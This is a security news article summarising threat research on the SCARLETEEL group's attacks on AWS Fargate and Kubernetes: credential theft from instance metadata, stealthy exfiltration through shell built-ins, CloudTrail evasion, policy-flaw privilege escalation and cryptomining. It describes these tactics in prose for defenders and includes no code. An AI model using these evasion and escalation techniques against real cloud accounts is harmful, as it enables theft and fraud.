SCARLETEEL Fine-Tunes AWS and Kubernetes Attack Tactics
With SCARLETEEL, attackers can exploit a vulnerable Kubernetes container and pivot to going after the underlying cloud service account.
Back in February, the Sysdig Threat Research Team discovered a sophisticated cloud attack in the wild, SCARLETEEL, It exploited containerized workloads and leveraged them into AWS privilege attacks. That was bad. It’s gotten worse. Now, Sysdig has found it targeting more advanced platforms, such as AWS Fargate.
Reiterating previous strategies, the group’s recent activities involved compromising AWS accounts by exploiting weak compute services, establishing persistence, and deploying cryptominers to secure financial gain. If unchecked, the group was projected to mine approximately $4,000 per day.
But, wait, there’s more! SCARLETEEL is also in the business of intellectual property theft.
During the recent attack, the group discovered and exploited a loophole in an AWS policy, allowing them to escalate privileges to AdministratorAccess, thereby gaining total control over the targeted account. They have also expanded their focus to Kubernetes, intending to scale up their attacks.
The recent attack brought some new features to the fore. These included:
- Scripts capable of detecting Fargate-hosted containers and collecting credentials.
- Escalation to Admin status in the victim’s AWS account to start EC2 instances running miners.
- Improved tools and techniques to enhance their attack capabilities and evasion techniques.
- Exploitation attempts of IMDSv2 to retrieve tokens and AWS credentials.
- Multiple changes in C2 domains, leveraging public services for data transmission.
- Use of AWS CLI and pacu on exploited containers to increase AWS exploitation.
- Use the Kubernetes Penetration Testing tool peirates to exploit Kubernetes further.
SCARLETEEL has also shown a particular fondness for AWS credential theft by exploiting JupyterLab notebook containers deployed in a Kubernetes cluster. This approach involved leveraging several versions of credential-stealing scripts, employing varying techniques and exfiltration endpoints. These scripts hunt for AWS credentials by contacting instance metadata (both IMDSv1 and IMDSv2), in the filesystem, and within Docker containers on the target machine, regardless of their running status.
Interestingly, the exfiltration function employed uses shell built-ins to transmit the Base64 encoded stolen credentials to the C2 IP Address, a stealthier approach that evades tools that typically monitor curl and wget.
By manipulating the “–endpoint-url” option, the group also redirects API requests away from default AWS services endpoints, preventing these requests from appearing in the victim’s CloudTrail. Given the opportunity, it will download and run Mirai Botnet Pandora, a Distributed Denial of Service (DDoS) malware program,
After collecting the AWS keys, SCARLETEEL automated reconnaissance in the victim’s AWS environment. A misstep in the victim’s user naming convention allowed the attackers to bypass a policy that would have otherwise prevented access key creation for admin users.
Once admin access was secured, SCARLETEEL focused on persistence, creating new users and access keys for all users in the account. With admin access, the group then deployed 42 instances of c5.metal/r5a.4xlarge for cryptomining.
Although the noisy launch of excessive instances led to the attacker’s discovery, the assault did not stop there. The attacker turned to other new or compromised accounts, attempting to steal secrets or update SSH keys to create new instances. In the event, the lack of privileges thwarted further progression.
Still, this is a disturbing attack. “The combination of automation and manual review of the collected data makes this attacker a more dangerous threat,” the report author, Alessandro Brucato, Sysdig Threat Research Engineer. Pointed out. “It isn’t just nuisance malware, like a crypto miner is often thought of, as they are looking at as much of the target environment as they can.”
The SCARLETEEL operation’s continued activity underscores the need for multiple defensive layers, including runtime threat detection, response, Vulnerability Management, cloud security posture management (CSPM), and cloud infrastructure entitlement management (CIEM). The absence of these layers could expose organizations to significant financial risks and data theft. To deal with attackers like SCARLETEEL, it’s all hands and tools on deck.